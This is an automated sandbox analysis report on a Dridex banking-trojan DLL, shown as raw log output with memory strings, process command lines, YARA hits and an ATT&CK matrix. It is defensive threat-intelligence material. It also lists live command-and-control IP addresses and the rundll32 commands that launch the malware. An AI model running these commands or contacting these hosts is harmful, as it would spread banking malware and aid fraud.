                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/_
                      Source: loaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/a
                      Source: loaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dll
                      Source: loaddll32.exe, 00000000.00000003.487595623.000000000077C000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/aenh.dllB
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpString found in binary or memory: https://192.46.210.220/en-US
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/f
                      Source: rundll32.exe, 00000003.00000003.642654981.0000000004A10000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/graphy
                      Source: rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/ography
                      Source: rundll32.exe, 00000003.00000003.625741355.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/u
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://192.46.210.220/z
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96/l
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/
                      Source: loaddll32.exe, 00000000.00000003.604185957.000000000077D000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6/
                      Source: loaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/6/Q
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/6/a
                      Source: rundll32.exe, 00000003.00000003.774804803.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/7
                      Source: rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.642654981.0000000004A10000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.785750413.0000000004A0C000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/Microsoft
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/b
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/der
                      Source: rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.637471085.0000000004A10000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/graphy
                      Source: loaddll32.exe, 00000000.00000002.781170560.0000000000775000.00000004.00000020.sdmpString found in binary or memory: https://45.77.0.96:6891/i
                      Source: rundll32.exe, 00000003.00000003.642654981.0000000004A10000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/o
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/q
                      Source: loaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpString found in binary or memory: https://45.77.0.96:6891/y
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5439F9 InternetReadFile,
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49771 version: TLS 1.2
                      Source: loaddll32.exe, 00000000.00000002.780716842.000000000070B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 6.3.rundll32.exe.2e6db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.2e6db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eadb55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.59db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.57db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.486db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.59db55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.57db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.486db55.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2eadb55.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.347040697.0000000004850000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.384482300.0000000002E50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.784194713.000000006E511000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.388197619.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.347778721.0000000000580000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.366765780.0000000002E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.785930808.000000006E511000.00000020.00020000.sdmp, type: MEMORY
                      Detected Dridex e-Banking trojanShow sources
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5151A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5267C8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E531240
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E519E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E529E70
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52A660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E537660
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E532E60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51CA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E530220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53D620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E516AD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5296D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E533EC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53FA10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52B6F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E528EF0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5362F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52F6E0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52AE80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E528AB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5326B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E531EB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52BF50
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E539B10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E533B00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E531730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5283C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E527FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E537FC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52E3F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52D030
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E531020
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51ACD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52A0D0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5298DA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5288C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E528CC0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E535CB0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52E0A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E534CA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5350A0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53DCA0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E511570
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E527564
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52FDD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5389F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5371F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52C590
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E52D980
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53D180
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51F9A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00DCE8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00DCE8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00DCE8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_00DCE8F8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006DE42D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E94AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E94AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006EE3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006ED8FF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E94AE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E94AE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E5222A0 NtDelayExecution,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53BE30 NtClose,
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllVirustotal: Detection: 7%
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllReversingLabs: Detection: 27%
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Bluewing
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Masterjust
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Bluewing
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Earth
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Masterjust
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                      Source: classification engineClassification label: mal84.bank.troj.evad.winDLL@11/2@0/4
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Bluewing
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.4566Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic file information: File size 1375232 > 1048576
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.784937216.000000006E5D7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.786186037.000000006E5D7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.28328.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006DC07D pushfd ; retn 006Dh
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006DCA58 push 7804A13Eh; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E2758 push ss; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E8F1B push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E40ED push esp; retf 0076h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E7EE4 push ss; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006E43AD push esp; retf 0076h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_3_006DC280 pushfd ; retn 006Dh
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\loaddll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E523930 GetTokenInformation,GetTokenInformation,GetSystemInfo,GetTokenInformation,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53CEF8 FindFirstFileExW,
                      Source: loaddll32.exe, 00000000.00000002.781060647.000000000076D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                      Source: loaddll32.exe, 00000000.00000002.780748710.0000000000718000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWPXw%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E526C50 KiUserExceptionDispatcher,LdrLoadDll,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E527A60 RtlAddVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1
                      Source: loaddll32.exe, 00000000.00000002.783245916.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.785236611.0000000002E50000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
                      Source: loaddll32.exe, 00000000.00000002.783245916.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.785236611.0000000002E50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.783245916.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.785236611.0000000002E50000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.783245916.0000000001280000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.785236611.0000000002E50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E522980 GetUserNameW,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection112Process Injection112Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsObfuscated Files or Information1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSAccount Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Owner/User Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery13Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Variant.Razy.980776.28328.dll7%VirustotalBrowse
                      SecuriteInfo.com.Variant.Razy.980776.28328.dll27%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://143.244.140.214:808/hy0%URL Reputationsafe
                      https://192.46.210.220/z0%Avira URL Cloudsafe
                      https://192.46.210.220/u0%Avira URL Cloudsafe
                      https://192.46.210.220/.0.96:6891/0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dll0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/0%URL Reputationsafe
                      https://192.46.210.220/Certification0%URL Reputationsafe
                      https://45.77.0.96/0%URL Reputationsafe
                      https://185.56.219.47:8116/oft0%Avira URL Cloudsafe
                      https://192.46.210.220/aenh.dllB0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/o0%Avira URL Cloudsafe
                      https://185.56.219.47/)0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/q0%Avira URL Cloudsafe
                      https://143.244.140.214:808/Z0%Avira URL Cloudsafe
                      https://143.244.140.214:808/oft0%URL Reputationsafe
                      https://192.46.210.220/graphy0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/6/0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/i0%Avira URL Cloudsafe
                      https://18192.46.210.220/0%Avira URL Cloudsafe
                      https://143.244.140.214:808/U0%Avira URL Cloudsafe
                      https://143.244.140.214:808/G0%Avira URL Cloudsafe
                      https://192.46.210.220/0%URL Reputationsafe
                      https://185.56.219.47:8116/soft0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/y0%Avira URL Cloudsafe
                      https://192.46.210.220//0%Avira URL Cloudsafe
                      https://143.244.140.214/A0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/der0%Avira URL Cloudsafe
                      https://192.46.210.220/;0%Avira URL Cloudsafe
                      https://143.244.140.214:808/x0%Avira URL Cloudsafe
                      https://143.244.140.214:808/.140.214:808/0%Avira URL Cloudsafe
                      https://143.244.140.214/0%URL Reputationsafe
                      https://185.56.219.47:8116/4.140.214:808/hy0%Avira URL Cloudsafe
                      https://185.56.219.47/0%URL Reputationsafe
                      https://45.77.0.96:6891/6/Q0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/Q0%Avira URL Cloudsafe
                      https://143.244.140.214:808/q0%Avira URL Cloudsafe
                      https://192.46.210.220/B0%Avira URL Cloudsafe
                      https://143.244.140.214:808/h0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/b0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/a0%Avira URL Cloudsafe
                      https://192.46.210.220/R0%Avira URL Cloudsafe
                      https://143.244.140.214:808/c0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/graphy0%URL Reputationsafe
                      https://143.244.140.214:808/0%URL Reputationsafe
                      https://192.46.210.220/M0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/0%URL Reputationsafe
                      https://192.46.210.220/Y0%Avira URL Cloudsafe
                      https://192.46.210.220/V0%Avira URL Cloudsafe
                      https://192.46.210.220/en-US0%Avira URL Cloudsafe
                      https://45.77.0.96/l0%Avira URL Cloudsafe
                      https://192.46.210.220/a0%Avira URL Cloudsafe
                      https://192.46.210.220/_0%Avira URL Cloudsafe
                      https://185.56.219.47:8116/90%Avira URL Cloudsafe
                      https://192.46.210.220/ography0%URL Reputationsafe
                      https://45.77.0.96:6891/6/a0%Avira URL Cloudsafe
                      https://192.46.210.220/f0%Avira URL Cloudsafe
                      https://45.77.0.96:6891/70%Avira URL Cloudsafe
                      https://45.77.0.96:6891/Microsoft0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://192.46.210.220/true
                      • URL Reputation: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://143.244.140.214:808/hyloaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.623291100.000000000077D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.631441493.000000000077D000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/zloaddll32.exe, 00000000.00000003.437725694.0000000000784000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/urundll32.exe, 00000003.00000003.625741355.0000000004A0F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/.0.96:6891/rundll32.exe, 00000003.00000003.713710363.0000000004A0F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://192.46.210.220/aenh.dllloaddll32.exe, 00000000.00000003.503888662.000000000077C000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
